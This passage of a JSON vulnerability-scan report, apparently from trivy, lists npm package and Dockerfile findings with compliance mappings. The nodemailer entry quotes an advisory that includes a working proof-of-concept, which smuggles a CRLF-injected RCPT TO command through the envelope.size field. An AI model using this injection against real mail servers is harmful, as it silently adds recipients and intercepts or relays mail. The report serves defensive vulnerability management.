'sender@example.com',\n to: 'recipient@example.com',\n subject: 'Normal email',\n text: 'This is a normal email.',\n envelope: {\n from: 'sender@example.com',\n to: ['recipient@example.com'],\n size: '100\\r\\nRCPT TO:',\n },\n }, (err) => {\n if (err) console.error('Error:', err.message);\n console.log('\\nExpected output above:');\n console.log(' C: MAIL FROM: SIZE=100');\n console.log(' C: RCPT TO: <-- INJECTED');\n console.log(' C: RCPT TO:');\n server.close();\n transporter.close();\n });\n});\n```\n\n**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM: SIZE=100\nC: RCPT TO:\nC: RCPT TO:\nC: DATA\n...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:` line is injected by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An attacker who can influence the `envelope.size` property in a `sendMail()` call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected `RCPT TO` commands, receiving copies of all emails sent through the affected transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage the sending organization's SMTP server reputation** for spam or phishing delivery\n\nThe severity is mitigated by the fact that the `envelope` object must be explicitly provided by the application. Nodemailer's default envelope construction from message headers does not include `size`. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current); likely all versions where `envelope.size` is supported.", + "remediation": "https://github.com/advisories/GHSA-c7w3-x93f-qmm8", + "references": [], + "tags": [ + "vulnerability", + "pkg:nodemailer@6.10.1" + ], + "raw": { + "VulnerabilityID": "GHSA-c7w3-x93f-qmm8", + "PkgID": "nodemailer@6.10.1", + "PkgName": "nodemailer", + "PkgIdentifier": { + "PURL": "pkg:npm/nodemailer@6.10.1", + "UID": "c243d03ecfce3c20" + }, + "InstalledVersion": "6.10.1", + "FixedVersion": "8.0.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-c7w3-x93f-qmm8", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:db7b269ba78fc172252ce3cd328867fff8504078f310f34689e0690febfd1a1e", + "Title": "Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter", + "Description": "### Summary\nWhen a custom `envelope` object is passed to `sendMail()` with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated directly into the SMTP `MAIL FROM` command without sanitization. This allows injection of arbitrary SMTP commands, including `RCPT TO` — silently adding attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size && this._supportedExtensions.includes('SIZE')) {\n args.push('SIZE=' + this._envelope.size);\n}\n```\n\nThis contrasts with other envelope parameters in the same function that ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\r\\n<>]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard envelope properties verbatim:\n\n```javascript\nconst standardFields = ['to', 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key => {\n if (!standardFields.includes(key)) {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs the envelope automatically from the message's `from`/`to` fields and does not include `size`. This vulnerability requires the application to explicitly pass a custom `envelope` object with a `size` property to `sendMail()`. \nWhile this limits the attack surface, applications that expose envelope configuration to users are affected.\n\n### PoC\nave the following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net = require('net');\nconst nodemailer = require('nodemailer');\n\n// Minimal SMTP server that logs raw commands\nconst server = net.createServer(socket => {\n socket.write('220 localhost ESMTP\\r\\n');\n let buffer = '';\n socket.on('data', chunk => {\n buffer += chunk.toString();\n const lines = buffer.split('\\r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n if (!line) continue;\n console.log('C:', line);\n if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL FROM')) {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\r\\n');\n } else if (line === 'DATA') {\n socket.write('354 Start\\r\\n');\n } else if (line === '.') {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n socket.write('221 Bye\\r\\n');\n socket.end();\n }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n const port = server.address().port;\n console.log('SMTP server on port', port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n port,\n secure: false,\n tls: { rejectUnauthorized: false },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n to: 'recipient@example.com',\n subject: 'Normal email',\n text: 'This is a normal email.',\n envelope: {\n from: 'sender@example.com',\n to: ['recipient@example.com'],\n size: '100\\r\\nRCPT TO:',\n },\n }, (err) => {\n if (err) console.error('Error:', err.message);\n console.log('\\nExpected output above:');\n console.log(' C: MAIL FROM: SIZE=100');\n console.log(' C: RCPT TO: <-- INJECTED');\n console.log(' C: RCPT TO:');\n server.close();\n transporter.close();\n });\n});\n```\n\n**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM: SIZE=100\nC: RCPT TO:\nC: RCPT TO:\nC: DATA\n...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:` line is injected by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An attacker who can influence the `envelope.size` property in a `sendMail()` call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected `RCPT TO` commands, receiving copies of all emails sent through the affected transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage the sending organization's SMTP server reputation** for spam or phishing delivery\n\nThe severity is mitigated by the fact that the `envelope` object must be explicitly provided by the application. Nodemailer's default envelope construction from message headers does not include `size`. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current); likely all versions where `envelope.size` is supported.", + "Severity": "LOW", + "VendorSeverity": { + "ghsa": 1 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", + "V40Score": 2.3 + } + }, + "References": [ + "https://github.com/nodemailer/nodemailer", + "https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651", + "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-c7w3-x93f-qmm8" + ], + "PublishedDate": "2026-03-26T22:26:46Z", + "LastModifiedDate": "2026-03-26T22:26:46Z" + }, + "context": { + "sbom": { + "name": "nodemailer", + "version": "6.10.1", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 6.666666666666666, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 2, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a6ff7b0fa39fdb3f", + "ruleId": "CVE-2026-41305", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of style closing tags", + "title": "CVE-2026-41305", + "description": "PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape `` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `` in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-41305", + "references": [], + "tags": [ + "vulnerability", + "pkg:postcss@8.4.31" + ], + "risk": { + "cwe": [ + "CWE-79" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-41305", + "VendorIDs": [ + "GHSA-qx2v-qp2m-jg93" + ], + "PkgID": "postcss@8.4.31", + "PkgName": "postcss", + "PkgIdentifier": { + "PURL": "pkg:npm/postcss@8.4.31", + "UID": "d845910d063cee9a" + }, + "InstalledVersion": "8.4.31", + "FixedVersion": "8.5.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41305", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0086ad0890ab40dce9aff6b30459bf2f3c009f942faa4825d50709ee67cab3d6", + "Title": "postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of style closing tags", + "Description": "PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape `` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `` in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-79" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-41305", + "https://github.com/postcss/postcss", + "https://github.com/postcss/postcss/releases/tag/8.5.10", + "https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93", + "https://nvd.nist.gov/vuln/detail/CVE-2026-41305", + "https://www.cve.org/CVERecord?id=CVE-2026-41305" + ], + "PublishedDate": "2026-04-24T03:16:11.547Z", + "LastModifiedDate": "2026-04-24T17:16:21.5Z" + }, + "context": { + "sbom": { + "name": "postcss", + "version": "8.4.31", + "path": "/package-lock.json" + } + }, + "compliance": { + "owaspTop10_2021": [ + "A03:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-79", + "rank": 1, + "category": "Injection" + } + ], + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "DETECT", + "category": "DE.CM", + "subcategory": "DE.CM-8", + "description": "Vulnerability scans are performed" + }, + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.2.4", + "description": "Prevent XSS attacks in bespoke software", + "priority": "CRITICAL" + }, + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1190", + "techniqueName": "Exploit Public-Facing Application", + "subtechnique": "", + "subtechniqueName": "" + }, + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.349866666666665, + "epss": 0.00031, + "epss_percentile": 0.09168, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00124, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "62517a0411bc2994", + "ruleId": "CVE-2026-45740", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "protobufjs: Denial of Service via unbounded recursive JSON descriptor expansion", + "title": "CVE-2026-45740", + "description": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON(). A crafted JSON descriptor with deeply nested namespace definitions could cause the JavaScript call stack to be exhausted during descriptor loading. This vulnerability is fixed in 7.5.8 and 8.2.0.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-45740", + "references": [], + "tags": [ + "vulnerability", + "pkg:protobufjs@7.5.6" + ], + "risk": { + "cwe": [ + "CWE-674" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-45740", + "VendorIDs": [ + "GHSA-jggg-4jg4-v7c6" + ], + "PkgID": "protobufjs@7.5.6", + "PkgName": "protobufjs", + "PkgIdentifier": { + "PURL": "pkg:npm/protobufjs@7.5.6", + "UID": "11481e02f6a2a6cd" + }, + "InstalledVersion": "7.5.6", + "FixedVersion": "7.5.8, 8.2.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45740", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0c7c535ab3a0329218c83c03c24db05aed8e9bc3de59ef7112b23085b7c52d89", + "Title": "protobufjs: Denial of Service via unbounded recursive JSON descriptor expansion", + "Description": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON(). A crafted JSON descriptor with deeply nested namespace definitions could cause the JavaScript call stack to be exhausted during descriptor loading. This vulnerability is fixed in 7.5.8 and 8.2.0.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-674" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/protobufjs/protobuf.js", + "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-jggg-4jg4-v7c6", + "https://nvd.nist.gov/vuln/detail/CVE-2026-45740" + ], + "PublishedDate": "2026-05-13T16:17:00.52Z", + "LastModifiedDate": "2026-05-13T20:50:15.587Z" + }, + "context": { + "sbom": { + "name": "protobufjs", + "version": "7.5.6", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.36426666666667, + "epss": 0.00058, + "epss_percentile": 0.1822, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00232, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4aee8c6d135a7c0c", + "ruleId": "CVE-2026-45736", + "severity": "MEDIUM", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "package-lock.json", + "startLine": 0 + }, + "message": "ws is an open source WebSocket client and server for Node.js. Prior to ...", + "title": "CVE-2026-45736", + "description": "ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.", + "remediation": "https://avd.aquasec.com/nvd/cve-2026-45736", + "references": [], + "tags": [ + "vulnerability", + "pkg:ws@8.18.3" + ], + "risk": { + "cwe": [ + "CWE-908" + ] + }, + "raw": { + "VulnerabilityID": "CVE-2026-45736", + "VendorIDs": [ + "GHSA-58qx-3vcg-4xpx" + ], + "PkgID": "ws@8.18.3", + "PkgName": "ws", + "PkgIdentifier": { + "PURL": "pkg:npm/ws@8.18.3", + "UID": "f8dc386179443300" + }, + "InstalledVersion": "8.18.3", + "FixedVersion": "8.20.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45736", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:54b51dc0dfb29c3a34ed11a3c1a3c26e8c1546c9a2c83cff9b3d42b63d290b98", + "Title": "ws is an open source WebSocket client and server for Node.js. Prior to ...", + "Description": "ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-908" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 4.4 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/websockets/ws", + "https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086", + "https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-45736" + ], + "PublishedDate": "2026-05-15T15:16:54.103Z", + "LastModifiedDate": "2026-05-19T14:39:20.353Z" + }, + "context": { + "sbom": { + "name": "ws", + "version": "8.18.3", + "path": "/package-lock.json" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 13.338133333333333, + "epss": 9e-05, + "epss_percentile": 0.00961, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.00036, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "eba667be954e5b93", + "ruleId": "Image user should not be 'root'", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "Dockerfile.dev", + "startLine": 0 + }, + "message": "Image user should not be 'root'", + "title": "Image user should not be 'root'", + "description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", + "remediation": "https://avd.aquasec.com/misconfig/ds-0002", + "references": [], + "tags": [ + "misconfig" + ], + "raw": { + "Type": "Dockerfile Security Check", + "ID": "DS-0002", + "Title": "Image user should not be 'root'", + "Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", + "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", + "Namespace": "builtin.dockerfile.DS002", + "Query": "data.builtin.dockerfile.DS002.deny", + "Resolution": "Add 'USER ' line to the Dockerfile", + "Severity": "HIGH", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", + "References": [ + "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", + "https://avd.aquasec.com/misconfig/ds-0002" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 23.333333333333336, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 7, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "63eaab178df076b0", + "ruleId": "No HEALTHCHECK defined", + "severity": "LOW", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "Dockerfile.dev", + "startLine": 0 + }, + "message": "No HEALTHCHECK defined", + "title": "No HEALTHCHECK defined", + "description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", + "remediation": "https://avd.aquasec.com/misconfig/ds-0026", + "references": [], + "tags": [ + "misconfig" + ], + "raw": { + "Type": "Dockerfile Security Check", + "ID": "DS-0026", + "Title": "No HEALTHCHECK defined", + "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", + "Message": "Add HEALTHCHECK instruction in your Dockerfile", + "Namespace": "builtin.dockerfile.DS026", + "Query": "data.builtin.dockerfile.DS026.deny", + "Resolution": "Add HEALTHCHECK instruction in Dockerfile", + "Severity": "LOW", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", + "References": [ + "https://blog.aquasec.com/docker-security-best-practices", + "https://avd.aquasec.com/misconfig/ds-0026" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 6.666666666666666, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 2, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e68d0bbfcfdade0c", + "ruleId": "Image user should not be 'root'", + "severity": "HIGH", + "tool": { + "name": "trivy", + "version": "unknown" + }, + "location": { + "path": "Dockerfile.production", + "startLine": 0 + }, + "message": "Image user should not be 'root'", + "title": "Image user should not be 'root'", + "description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", + "remediation": "https://avd.aquasec.com/misconfig/ds-0002", + "references": [], + "tags": [ + "misconfig" + ], + "raw": { + "Type": "Dockerfile Security Check", + "ID": "DS-0002", + "Title": "Image user should not be 'root'", + "Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", + "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", + "Namespace": 